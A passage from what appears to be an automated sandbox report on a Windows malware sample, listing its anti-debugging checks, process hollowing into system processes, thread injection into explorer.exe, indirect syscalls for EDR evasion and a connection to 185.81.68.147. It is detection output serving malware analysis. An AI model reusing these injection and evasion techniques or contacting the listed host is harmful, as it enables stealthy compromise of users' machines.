                    Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-879
                    Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-873
                    Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-882
                    Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-891
                    Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-888
                    Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-897
                    Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-892
                    Source: C:\Windows\System32\audiodg.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853131B8 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF7853131B8
                    Found API chain indicative of debugger detection
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_0-1177
                    Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_9-1124
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_7-1129
                    Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_2-1126
                    Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_10-1139
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853131B8 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF7853131B8
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0C4124 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_0B0C4124
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A8660 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,5_2_0B0A8660
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853114EC LoadLibraryA,GetProcAddress,0_2_00007FF7853114EC
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B6F345 mov eax, dword ptr fs:[00000030h]5_2_00B6F345
                    Source: C:\Windows\explorer.exeCode function: 5_2_02C0F345 mov eax, dword ptr fs:[00000030h]5_2_02C0F345
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9BF345 mov eax, dword ptr fs:[00000030h]5_2_0B9BF345
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF78531216C InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF78531216C
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF390 SetUnhandledExceptionFilter,5_2_0B0CF390
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0C24F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0B0C24F0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729359924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF729359924
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72934C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF72934C44C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72934BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF72934BBC0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72934C62C SetUnhandledExceptionFilter,12_2_00007FF72934C62C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729359924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF729359924
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72934C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF72934C44C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72934BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF72934BBC0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF72934C62C SetUnhandledExceptionFilter,13_2_00007FF72934C62C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAC0F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBABAC0F20
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABA9A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBABA9A184
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBBCF75DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBBCF75DF8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBBCF769F8 SetUnhandledExceptionFilter,13_2_00007FFBBCF769F8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBBCF76810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBBCF76810
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC3135054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBC3135054
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC3134A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBC3134A34
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBC31DD414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBC31DD414
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Benign windows process drops PE files
                    Source: C:\Windows\explorer.exeFile created: 25A2.tmp.ssg.exe.5.drJump to dropped file
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7EE060000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7EE060000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7EE060000 protect: page execute and read and writeJump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853124D8 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF7853124D8
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Windows\System32\audiodg.exeThread created: C:\Windows\explorer.exe EIP: 2BE0000Jump to behavior
                    Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: B40000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeThread created: C:\Windows\explorer.exe EIP: B990000Jump to behavior
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeNtUnmapViewOfSection: Indirect: 0x7FF6DAD7286CJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeNtUnmapViewOfSection: Indirect: 0x7FF78531286CJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE060000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: 2BE0535 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: B40535 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: B990535 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE060000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE060000 value starts with: 4D5AJump to behavior
                    Injects code into the Windows Explorer (explorer.exe)
                    Source: C:\Windows\System32\audiodg.exeMemory written: PID: 4084 base: 2BE0000 value: 40Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: PID: 4084 base: 2BE0535 value: 4DJump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: PID: 4084 base: B40000 value: 40Jump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: PID: 4084 base: B40535 value: 4DJump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: PID: 4084 base: B990000 value: 40Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: PID: 4084 base: B990535 value: 4DJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeThread register set: target process: 6476Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeThread register set: target process: 2800Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeThread register set: target process: 796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeThread register set: target process: 4424Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeThread register set: target process: 5924Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeThread register set: target process: 2664Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeThread register set: target process: 5796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeThread register set: target process: 6632Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeThread register set: target process: 1628Jump to behavior
                    Sample uses process hollowing technique
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7EE060000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7EE060000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7EE060000Jump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC841000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC845000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC848000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC849000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84A000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84B000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\audiodg.exe base: 38D9FFB010Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D1000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D8000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D9000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DA000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DB000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\svchost.exe base: C70F05A010Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE060000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE061000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE065000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE068000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE069000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE06A000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE06B000Jump to behavior
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeMemory written: C:\Windows\System32\msiexec.exe base: 1FC7B3C010Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: 2BE0000Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: 2BE0535Jump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: B40000Jump to behavior
                    Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: B40535Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: B990000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: B990535Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D1000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D8000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D9000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DA000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DB000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 72F448E010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC841000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC845000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC848000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC849000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84B000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 2A01A9E010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE060000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE061000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE065000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE068000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE069000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE06A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7EE06B000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\msiexec.exe base: CF2925B010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D1000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D8000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D9000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DA000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DB000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\svchost.exe base: 3572AA2010Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC841000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC845000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC848000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC849000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84B000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeMemory written: C:\Windows\System32\audiodg.exe base: 805C78F010Jump to behavior
